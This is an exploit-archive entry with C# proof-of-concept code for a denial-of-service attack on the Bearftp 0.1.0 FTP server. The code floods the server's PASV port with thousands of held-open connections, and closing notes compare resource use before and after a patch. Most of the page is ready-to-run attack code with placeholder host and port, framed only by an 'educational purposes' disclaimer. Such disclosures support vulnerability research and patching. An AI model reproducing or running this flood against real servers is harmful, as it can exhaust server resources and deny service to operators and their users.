Bearftp 0.1.0 pasv denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-02-03 |
Type : dos |
Platform : linux
This exploit / vulnerability Bearftp 0.1.0 pasv denial of service is for educational purposes only and if it is used you will do on your own risk!
static void Main(string[] args)
{
Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
{
new Thread(() =>
{
Thread.CurrentThread.IsBackground = true;
TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
var ns = exploit.GetStream();
StreamWriter sw = new StreamWriter(ns);
sw.AutoFlush = true;
StreamReader sr = new StreamReader(ns);
while (true)
{
Thread.Sleep(5000); //We just spend our time.
}
}).Start();
Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
}
while (true)
{
Console.WriteLine("DoS attack completed!");
Thread.Sleep(20000);
}
}
/*
BEFORE PATCH APPLIED (after ~100 seconds of attacking):
3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
AFTER PATCH APPLIED:
10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */